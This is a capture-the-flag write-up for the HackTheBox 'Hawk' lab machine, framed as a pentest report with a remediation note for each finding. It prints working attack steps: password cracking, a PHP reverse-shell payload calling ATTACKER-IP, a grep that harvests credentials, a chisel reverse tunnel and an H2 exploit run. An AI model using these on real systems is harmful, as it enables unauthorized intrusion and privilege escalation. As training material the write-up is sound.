Hawk CTF Writeup

Hawk CTF icon

Hawk CTF

Hawk CTF is a medium to hard difficulty machine, which provides excellent practice in pentesting Drupal. The exploitable H2 DBMS installation is also realistic as web-based SQL consoles (RavenDB etc.) are found in many environments. The OpenSSL decryption challenge increases the difficulty of this machine.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Executive Summary

Introduction

This document shows the results of a security assessment performed on the Hawk machine (IP: 10.10.10.102). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.

Objective

The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.

Requirements

The assessment was conducted with the following requirements in mind:

  • Identify vulnerabilities within the Drupal CMS installation.
  • Exploit vulnerabilities to demonstrate potential impact.
  • Assess the effectiveness of access controls and authentication mechanisms.
  • Demonstrate privilege escalation from user-level to root.
  • Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.

High-Level Summary

The assessment uncovered several vulnerabilities within the Hawk machine:

  1. User Enumeration via Password Reset Error Message (Moderate Severity)
  2. Credentials Exposed via .drupal.txt.enc Decryption (High Severity)
  3. Initial Access via PHP Filter Module on Drupal CMS (High Severity)
  4. Cleartext Credentials Disclosure that led to LPE to "daniel" user (High Severity)
  5. Outdated software that led to LPE to root - H2 Database Console (Extreme Severity)

Detailed Findings

Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in "Independent Challenge" section.

Recommendations

Based on the assessment findings, the following recommendations are advised to enhance the security posture of the Hawk machine:

  1. CMS Security: Remove unnecessary modules, such as the PHP Filter Module, to reduce attack surface. Implement 2FA.
  2. Insecure Practices Related to Credentials: Enforce strong password policies and avoid password reuse, and review and improve the encryption and storage of sensitive files containing credentials.
  3. FTP Security: Implement proper access controls for the FTP service.
  4. Update H2 Database Console: Regularly update H2 Database to the latest version to mitigate known vulnerabilities.


Methodology

Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:

  1. Reconnaissance: The initial phase involved gathering information about open ports.

  2. Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.

  3. Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.

  4. Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.

  5. Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.

Color Legend

Console color legend:

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.102

Service Enumeration

IP AddressPorts Open
10.10.10.102TCP: 21, 22, 80, 5435, 8082, 9092
Nmap scan output

Web Server Enumeration (TCP: 80)

Running Apache httpd 2.4.29.

CMS Enumeration

The droopescan tool identified plugins, themes, and possible version information, including the default admin login URL. The command used was: droopescan scan drupal -u http://10.10.10.102

droopescan output

Username enumeration

Vulnerability Explanation: The web application's error message during a password reset request (at /user/password) exposes valid usernames on the system. This provides attackers with a list of valid accounts, facilitating targeted attacks.

Vulnerability Fix: Modify the error message to avoid disclosing valid usernames. Implement proper error handling and validation.

Severity: Moderate

Steps to Reproduce the Finding:

  1. Run the command: wfuzz -d "name=FUZZ&form_build_id=form-0SR6gkn5bmPLfm6PeBEdlOna5oOMAsN2YUFI21ja-iM&form_id=user_pass&op=E-mail+new+password" -w /usr/share/seclists/Usernames/Names/names.txt -H "Content-Type: application/x-www-form-urlencoded" --hc 200 http://10.10.10.102/user/password
  2. Analyze the responses to identify valid usernames.

FTP Enumeration (TCP: 21)

Anonymous Login and Data Leakage

Vulnerability Explanation: Anonymous login is enabled on the FTP server, allowing unauthorized access. An encrypted file .drupal.txt.enc containing potentially sensitive data was discovered. After downloading the file, Behind Security was able to crack it using a tool named "bruteforce-salted-openssl" and reveal the credentials for the admin user of Drupal CMS.

Vulnerability Fix: Disable anonymous FTP login. Review and improve the encryption and storage of sensitive files.

Severity: High

Steps to Reproduce the Attack:

  1. Log into the FTP server by leveraging the anonymous login capability. To do so, type the command ftp [email protected] and press enter when prompted for password.
  2. Download the encrypted file at messages/.drupal.txt.enc.
  3. Decode from base64 and save to another file by running the command: cat .drupal.txt.enc | base64 -d > drupal.txt
  4. Locally, crack the decryption password using the command: bruteforce-salted-openssl -f /usr/share/wordlists/rockyou.txt -d SHA256 -t 5 drupal.txt
  5. After retrieving the decryption password (REDACTED), use it to retrieve the contents of the file. The command is: openssl enc -aes-256-cbc -d -in drupal.txt -out decrypted.txt -k friends
  6. Now you can log in as admin using the password (REDACTED) to Drupal CMS on port 80.
Connecting to the FTP server, downloading the .drupal.txt.enc file, decoding its contents and cracking the decryption password.
Decrypting the message that reveals valid credentials for the admin user on Drupal CMS (port 80)

Initial Access - Tricking the CMS to Execute Malicious PHP Code

Vulnerability Explanation: Behind Security gained access to the Drupal CMS as an admin and exploited the PHP Filter Module to execute malicious PHP code.

Vulnerability Fix: Disable the PHP Filter Module altogether and conduct a thorough review of user permissions to prevent unauthorized code execution.

Severity: High

Steps to Reproduce the Attack:

  1. Log in as admin with the previously discovered password.
  2. Go to Modules -> (Check) PHP Filter -> Save configuration.
  3. Then, Add content -> Select Basic Page or Article and insert malicious php code in the body. In this case, <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/PORT 0>&1 '"); ?>
  4. Select PHP code in Text format and then select Preview.

Post-Exploitation

Privilege Escalation to "daniel"

Vulnerability Explanation: Behind Security conducted further enumeration and discovered credentials for a user named "daniel" by analyzing configuration files related to Drupal CMS.

Vulnerability Fix: Enforce unique and strong credentials for each user account. Avoid reusing passwords across different services.

Severity: High

Steps to Reproduce the Attack:

  1. Behind Security executed the following command: find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
  2. The credentials for the user "daniel" were identified.
  3. Behind Security was able to log in via SSH as [email protected], specifying the password: REDACTED
Exposed password
Changing user to "daniel" and escaping the python interpreter

Privilege Escalation to root

Vulnerability Explanation: Behind Security established a TCP tunnel using the tool "chisel" and exploited a vulnerability in the H2 Database version 1.4.196 to gain root access.

Vulnerability Fix: Regularly update and patch software components, including databases, to fix known vulnerabilities.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Behind Security established a TCP tunnel between their machine and the victim machine using the tool chisel: ./chisel server -p 1337 --reverse --socks5 & (attacker) and ./chisel client ATTACKER-IP:1337 R:socks & (victim).
  2. Behind Security accessed the H2 Database Console (localhost:8082) through the tunnel.
  3. The attacker exploited the H2 Database vulnerability using a public exploit. The command used during the engagement was: proxychains4 python 45506.py -H localhost:8082
Uploading chisel to the victim machine and setting up a tunnel
Foxyproxy firefox extension configuration in order to use chisel as a proxy
H2 Database panel accessed through chisel TCP tunnel on localhost:8082
Executing the exploit and obtaining root access

Conclusion

Behind Security successfully executed malicious PHP code within the CMS, escalated privileges to user “daniel”, and further exploited vulnerabilities in the H2 Database to gain root access. These findings underscore the importance of regularly updating and securing software components, implementing proper access controls, and maintaining strong authentication practices to mitigate the risk of unauthorized access and privilege escalation. Remediation measures should be promptly applied to address the identified vulnerabilities and enhance the security posture of the system.

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Scroll to Top